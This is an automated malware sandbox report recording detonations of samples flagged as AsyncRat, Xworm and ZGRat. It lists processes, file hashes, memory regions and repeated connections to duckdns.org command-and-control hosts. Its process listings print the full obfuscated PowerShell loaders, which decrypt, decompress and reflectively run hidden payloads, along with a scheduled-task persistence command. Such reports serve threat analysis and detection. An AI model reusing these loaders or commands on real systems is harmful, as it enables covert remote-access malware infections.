| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vbdsg.duckdns.org | udp |
| GB | 57.128.155.22:8896 | vbdsg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 22.155.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
memory/3604-0-0x0000013AFAFE0000-0x0000013AFB002000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4zvze4pc.cwp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3604-10-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp
memory/3604-11-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp
memory/3604-12-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp
memory/3604-13-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp
memory/3604-14-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp
memory/3604-15-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp
memory/3604-16-0x0000013A90600000-0x0000013A90654000-memory.dmp
memory/3604-17-0x0000013A906B0000-0x0000013A90704000-memory.dmp
memory/3440-18-0x00000135D0C70000-0x00000135D0C80000-memory.dmp
memory/3440-19-0x00000135D28A0000-0x00000135D28B0000-memory.dmp
memory/3440-20-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp
memory/3440-21-0x00000135EB320000-0x00000135EB330000-memory.dmp
memory/3440-22-0x00000135EB320000-0x00000135EB330000-memory.dmp
memory/3604-25-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp
memory/3604-26-0x0000013A906B0000-0x0000013A90704000-memory.dmp
memory/3440-27-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp
memory/3440-28-0x00000135EB320000-0x00000135EB330000-memory.dmp
memory/3440-29-0x00000135EB320000-0x00000135EB330000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
149s
Max time network
158s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd';$GZdQ='InnxIivnxIionxIikenxIi'.Replace('nxIi', ''),'MafFZUifFZUnMfFZUofFZUdulfFZUefFZU'.Replace('fFZU', ''),'RBxvFeaBxvFdLBxvFiBxvFneBxvFsBxvF'.Replace('BxvF', ''),'CryZmpeatyZmpeDyZmpeyZmpcryZmpypyZmptoyZmpryZmp'.Replace('yZmp', ''),'GeCwGCtCCwGCuCwGCrrCwGCenCwGCtCwGCPrCwGCoceCwGCssCwGC'.Replace('CwGC', ''),'ENPQHntNPQHryNPQHPoNPQHintNPQH'.Replace('NPQH', ''),'SZRwRpliZRwRtZRwR'.Replace('ZRwR', ''),'LoTzLuadTzLu'.Replace('TzLu', ''),'DeczTyPompzTyPreszTyPszTyP'.Replace('zTyP', ''),'CofgggpyfgggTofggg'.Replace('fggg', ''),'TrRwWianRwWisfoRwWirRwWimRwWiFiRwWinaRwWilBRwWiloRwWickRwWi'.Replace('RwWi', ''),'ChxtFnanxtFngextFnExxtFntenxtFnsxtFnioxtFnnxtFn'.Replace('xtFn', ''),'FrowqBNmwqBNBwqBNasewqBN64wqBNStrwqBNinwqBNgwqBN'.Replace('wqBN', ''),'ElMUHUeMUHUmMUHUentMUHUAtMUHU'.Replace('MUHU', '');powershell -w hidden;function vJfVF($ktYNE){$OYIYV=[System.Security.Cryptography.Aes]::Create();$OYIYV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OYIYV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OYIYV.Key=[System.Convert]::($GZdQ[12])('HessG9Sp8I98uzvuAQwIGoeAOpm2R4JZwqif+tn9mzM=');$OYIYV.IV=[System.Convert]::($GZdQ[12])('Sq8oY624DUi5D/0NV4f3lQ==');$NPmYK=$OYIYV.($GZdQ[3])();$clLIZ=$NPmYK.($GZdQ[10])($ktYNE,0,$ktYNE.Length);$NPmYK.Dispose();$OYIYV.Dispose();$clLIZ;}function JqmHs($ktYNE){$fhwpD=New-Object System.IO.MemoryStream(,$ktYNE);$yEEHb=New-Object System.IO.MemoryStream;$CPPWk=New-Object System.IO.Compression.GZipStream($fhwpD,[IO.Compression.CompressionMode]::($GZdQ[8]));$CPPWk.($GZdQ[9])($yEEHb);$CPPWk.Dispose();$fhwpD.Dispose();$yEEHb.Dispose();$yEEHb.ToArray();}$rlqXf=[System.IO.File]::($GZdQ[2])([Console]::Title);$bUDiU=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 5).Substring(2))));$hdfCS=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 6).Substring(2))));[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$hdfCS).($GZdQ[5]).($GZdQ[0])($null,$null);[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$bUDiU).($GZdQ[5]).($GZdQ[0])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 52.111.229.43:443 | tcp | |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
Files
memory/3676-0-0x000001C4FD590000-0x000001C4FD5B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orbceapg.1ev.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3676-10-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
memory/3676-12-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-11-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-13-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-14-0x000001C500000000-0x000001C500044000-memory.dmp
memory/3676-15-0x000001C500050000-0x000001C5000C6000-memory.dmp
memory/3292-25-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
memory/3292-26-0x0000028E360B0000-0x0000028E360C0000-memory.dmp
memory/3292-29-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
memory/3676-30-0x000001C498020000-0x000001C498034000-memory.dmp
memory/3676-31-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp
memory/3676-32-0x00007FFD39950000-0x00007FFD39A0E000-memory.dmp
memory/3676-33-0x000001C4982F0000-0x000001C498300000-memory.dmp
memory/3676-34-0x000001C498300000-0x000001C498316000-memory.dmp
memory/3676-35-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp
memory/3676-37-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
memory/3676-38-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-39-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-40-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
memory/3676-41-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
91s
Max time network
156s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2360 set thread context of 5072 | N/A | C:\Users\Admin\AppData\Local\Temp\fresh.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fresh.exe
"C:\Users\Admin\AppData\Local\Temp\fresh.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Local\Temp\bddddsx"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C copy "C:\Users\Admin\AppData\Local\Temp\fresh.exe" "C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vbdsg.duckdns.org | udp |
| GB | 57.128.155.22:8896 | vbdsg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 22.155.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
Files
memory/2360-0-0x00000000008A0000-0x00000000008CE000-memory.dmp
memory/2360-1-0x0000000074450000-0x0000000074C00000-memory.dmp
memory/2360-2-0x0000000005210000-0x0000000005220000-memory.dmp
memory/2360-3-0x0000000005290000-0x00000000052F6000-memory.dmp
memory/2360-4-0x00000000058B0000-0x0000000005E54000-memory.dmp
memory/5072-5-0x0000000000400000-0x0000000000410000-memory.dmp
memory/5072-6-0x00000000051F0000-0x000000000528C000-memory.dmp
memory/5072-7-0x0000000074450000-0x0000000074C00000-memory.dmp
memory/2360-11-0x0000000074450000-0x0000000074C00000-memory.dmp
memory/5072-12-0x0000000005450000-0x0000000005460000-memory.dmp
memory/5072-13-0x0000000005B00000-0x0000000005B92000-memory.dmp
memory/5072-14-0x0000000005AA0000-0x0000000005AAA000-memory.dmp
memory/5072-15-0x0000000074450000-0x0000000074C00000-memory.dmp
memory/5072-16-0x0000000005450000-0x0000000005460000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:51
Platform
win10v2004-20240412-en
Max time kernel
77s
Max time network
92s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd';$LILq='LGNGQoGNGQadGNGQ'.Replace('GNGQ', ''),'ElevbZPmvbZPenvbZPtvbZPAvbZPtvbZP'.Replace('vbZP', ''),'InUMsVvoUMsVkUMsVeUMsV'.Replace('UMsV', ''),'CopFijyyTFijyoFijy'.Replace('Fijy', ''),'CZakhhaZakhnZakhgeEZakhxtZakhenZakhsZakhioZakhnZakh'.Replace('Zakh', ''),'ReyUhbayUhbdyUhbLiyUhbnesyUhb'.Replace('yUhb', ''),'SOZpUplOZpUitOZpU'.Replace('OZpU', ''),'TrMlaCanMlaCsMlaCfMlaCoMlaCrMlaCmFiMlaCnalMlaCBlMlaCockMlaC'.Replace('MlaC', ''),'MaXOkGiXOkGnXOkGModXOkGulXOkGeXOkG'.Replace('XOkG', ''),'EnkMdetrykMdePokMdeinkMdetkMde'.Replace('kMde', ''),'FrwpnfomwpnfBawpnfse6wpnf4Stwpnfrwpnfingwpnf'.Replace('wpnf', ''),'GemcvPtCmcvPurmcvPrmcvPenmcvPtPrmcvPocmcvPessmcvP'.Replace('mcvP', ''),'DecxpgKoxpgKmxpgKpxpgKresxpgKsxpgK'.Replace('xpgK', ''),'CrtTyceattTycetTycDetTyccrtTycypttTycortTyc'.Replace('tTyc', '');powershell -w hidden;function aPNpf($nVNGI){$htbMs=[System.Security.Cryptography.Aes]::Create();$htbMs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$htbMs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$htbMs.Key=[System.Convert]::($LILq[10])('/MlRmzNe+ZzBdBywbWhCQRBk9F+NMckIyZTwiuahK6M=');$htbMs.IV=[System.Convert]::($LILq[10])('XI44fhXZ241HbBx9GSgTSw==');$jJhvE=$htbMs.($LILq[13])();$EHnru=$jJhvE.($LILq[7])($nVNGI,0,$nVNGI.Length);$jJhvE.Dispose();$htbMs.Dispose();$EHnru;}function vSJcW($nVNGI){$EemcA=New-Object System.IO.MemoryStream(,$nVNGI);$NFsIp=New-Object System.IO.MemoryStream;$lBDbC=New-Object System.IO.Compression.GZipStream($EemcA,[IO.Compression.CompressionMode]::($LILq[12]));$lBDbC.($LILq[3])($NFsIp);$lBDbC.Dispose();$EemcA.Dispose();$NFsIp.Dispose();$NFsIp.ToArray();}$HrliX=[System.IO.File]::($LILq[5])([Console]::Title);$cGEtH=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 5).Substring(2))));$IdyPm=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 6).Substring(2))));[System.Reflection.Assembly]::($LILq[0])([byte[]]$IdyPm).($LILq[9]).($LILq[2])($null,$null);[System.Reflection.Assembly]::($LILq[0])([byte[]]$cGEtH).($LILq[9]).($LILq[2])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Epbiwzhzg = Get-Content 'C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat' | select-object -Last 1; $Pidhuf = [System.Convert]::FromBase64String($Epbiwzhzg);$Kfgkov = New-Object System.IO.MemoryStream( , $Pidhuf );$Rtzup = New-Object System.IO.MemoryStream;$Hvtlgiqv = New-Object System.IO.Compression.GzipStream $Kfgkov, ([IO.Compression.CompressionMode]::Decompress);$Hvtlgiqv.CopyTo( $Rtzup );$Hvtlgiqv.Close();$Kfgkov.Close();[byte[]] $Pidhuf = $Rtzup.ToArray();[Array]::Reverse($Pidhuf); $Ujrulpn = [System.Threading.Thread]::GetDomain().Load($Pidhuf); $Gkwzgehresm = $Ujrulpn.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qiygww.cmd" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Lqctry = Get-Content 'C:\Users\Admin\AppData\Local\Temp\qiygww.cmd' | select-object -Last 1; $Gepinqdfw = [System.Convert]::FromBase64String($Lqctry);$Smjhpgfd = New-Object System.IO.MemoryStream( , $Gepinqdfw );$Ebvvkvbqat = New-Object System.IO.MemoryStream;$Ouefwyswci = New-Object System.IO.Compression.GzipStream $Smjhpgfd, ([IO.Compression.CompressionMode]::Decompress);$Ouefwyswci.CopyTo( $Ebvvkvbqat );$Ouefwyswci.Close();$Smjhpgfd.Close();[byte[]] $Gepinqdfw = $Ebvvkvbqat.ToArray();[Array]::Reverse($Gepinqdfw); $Tyossrcg = [System.Threading.Thread]::GetDomain().Load($Gepinqdfw); $Tzmchvhv = $Tyossrcg.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mfgpgc.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ixgyed.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Wogaptd = Get-Content 'C:\Users\Admin\AppData\Local\Temp\ixgyed.bat' | select-object -Last 1; $Bbvjyjl = [System.Convert]::FromBase64String($Wogaptd);$Osqqdzvqkq = New-Object System.IO.MemoryStream( , $Bbvjyjl );$Ooivncxsvx = New-Object System.IO.MemoryStream;$Ouqoommak = New-Object System.IO.Compression.GzipStream $Osqqdzvqkq, ([IO.Compression.CompressionMode]::Decompress);$Ouqoommak.CopyTo( $Ooivncxsvx );$Ouqoommak.Close();$Osqqdzvqkq.Close();[byte[]] $Bbvjyjl = $Ooivncxsvx.ToArray();[Array]::Reverse($Bbvjyjl); $Bjklpyasha = [System.Threading.Thread]::GetDomain().Load($Bbvjyjl); $Pldyxr = $Bjklpyasha.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jdokds.duckdns.org | udp |
| GB | 57.128.155.22:8895 | jdokds.duckdns.org | tcp |
| US | 8.8.8.8:53 | 22.155.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_soxeb2uu.sji.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5084-9-0x000001F4623D0000-0x000001F4623F2000-memory.dmp
memory/5084-10-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp
memory/5084-11-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
memory/5084-12-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
memory/5084-13-0x000001F4627A0000-0x000001F4627E4000-memory.dmp
memory/5084-14-0x000001F462870000-0x000001F4628E6000-memory.dmp
memory/3092-17-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp
